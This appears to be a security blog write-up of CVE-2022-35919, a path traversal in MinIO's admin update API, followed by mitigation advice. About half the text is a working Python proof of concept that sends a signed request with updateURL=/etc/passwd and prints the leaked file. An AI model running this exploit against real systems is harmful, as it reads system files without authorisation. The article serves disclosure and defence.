Vulnerability Analysis: An In-Depth Look at CVE-2022-35919

MinIO is a high-performance object storage solution, which is licensed under the GNU Affero General Public License v3.0.

A security vulnerability has been identified in MinIO, known as CVE-2022-35919, which can be exploited via a path traversal attack.

In versions vulnerable to this exploit, all ‘admin’ users with authorization for admin:ServerUpdate can intentionally induce an error which in turn, reveals the content of the requested path.

Essentially, any system would allow access to contents at any arbitrary paths that are readable by the MinIO process.

To mitigate this issue, users are recommended to update their MinIO software.

If updating is not possible, users may disable the ServerUpdate API by refusing the admin:ServerUpdate action for admin users through IAM policies.

Exploiting CVE-2022-35919

The following is a guide on how to exploit CVE-2022-35919, originally developed by Jenson Zhao.

This exploit was tested on Windows 10 and applies to all versions up to 2022-07-29T19-40-48Z.

Before execution, ensure to install minio and requests using pip.

Firstly, import the necessary libraries:

import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3

Next, define a class MyMinio():

class MyMinio():
    secure = False

    def __init__(self, base_url, access_key, secret_key):
        self.credits = Credentials(
            access_key=access_key,
            secret_key=secret_key
        )
        if base_url.startswith('http://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
        elif base_url.startswith('https://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
            self.secure = True
        else:
            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')

Then, define the poc() function:

    def poc(self):
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(self.url)

Next, prepare the headers for the request:

        headers = {
            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }

Sign the headers:

        headers = sign_v4_s3(
            method='POST',
            url=urls,
            region='',
            headers=headers,
            credentials=self.credits,
            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            date=datetimes,
        )

Depending on whether the connection is secure or not, make a POST request:

        if self.secure:
            response = requests.post(url=self.url, headers=headers, verify=False)
        else:
            response = requests.post(url=self.url, headers=headers)

Finally, parse the response and provide feedback:

try:
            message = json.loads(response.text)['Message']
            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
            matches = re.findall(pattern, message)
            if matches:
                print('There is CVE-2022-35919 problem with the url!')
                print('The contents of the /etc/passwd file are as follows:')
                for match in matches:
                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
                                                        match[6]))
            else:
                print('There is no CVE-2022-35919 problem with the url!')
                print('Here is the response message content:')
                print(message)
        except Exception as e:
            print(
                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
            print(response.text)

The main function will parse the command-line arguments and execute the exploit:

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    args = parser.parse_args()
    minio = MyMinio(args.url, args.accesskey, args.secretkey)
    minio.poc()

This guide provides a step-by-step process of exploiting the CVE-2022-35919 vulnerability in MinIO.

Mitigations

Update Your Software

The most effective way to mitigate the risk posed by CVE-2022-35919 is by updating your MinIO software.

The developers have released a new version of the software that addresses this vulnerability.

By updating to the latest version, you can ensure that your system is no longer susceptible to this specific exploit.

Always keep your software updated, as updates often include patches for known vulnerabilities.

Restrict ServerUpdate API Access

If updating your MinIO software isn’t immediately feasible, an alternative mitigation strategy involves restricting access to the ServerUpdate API.

This can be achieved by denying the admin:ServerUpdate action for admin users through your IAM policies.

By doing so, you can prevent unauthorized users from triggering the error that leads to the path traversal attack.

Enforce Principle of Least Privilege

As a preventive measure, adopt the principle of least privilege (PoLP) across your systems.

This principle ensures that an account, program, or system process is not granted more permissions than necessary to perform its intended function.

By enforcing PoLP, you can limit the potential impact of a compromised admin account.

Regularly Monitor System Logs

Regular monitoring of system logs can help detect any unusual activity or potential security breaches.

If an admin user is triggering errors that reveal file paths, this activity should be logged and reviewed.

Early detection of such anomalies can prevent potential exploitation of this vulnerability.

Implement Security Awareness Training

Lastly, providing security awareness training to your team can also help mitigate the risk.

Ensure that all system administrators understand the nature of this vulnerability and the importance of following best practices when it comes to system updates and access control.

Remember, mitigating this vulnerability requires a multi-faceted approach that includes not only technical measures but also informed and vigilant personnel.

Conclusion

In the ever-evolving landscape of cybersecurity, staying informed and updated is crucial. The vulnerability identified as CVE-2022-35919 in MinIO’s object storage software is a stark reminder of this reality.

While the exploit poses a significant security concern, the good news is that there are effective mitigation strategies available.

By promptly updating your MinIO software to the latest version, you can effectively eliminate the risk from this particular vulnerability.

If an immediate update isn’t possible, restricting access to the ServerUpdate API can serve as a useful stopgap measure.

Furthermore, adhering to principles like the principle of least privilege and regular system log monitoring can go a long way in fortifying your systems against potential threats.

Finally, remember that technology alone cannot fully safeguard your systems. A well-informed team that understands the nature of such vulnerabilities and the importance of best practices in system updates and access control is equally important.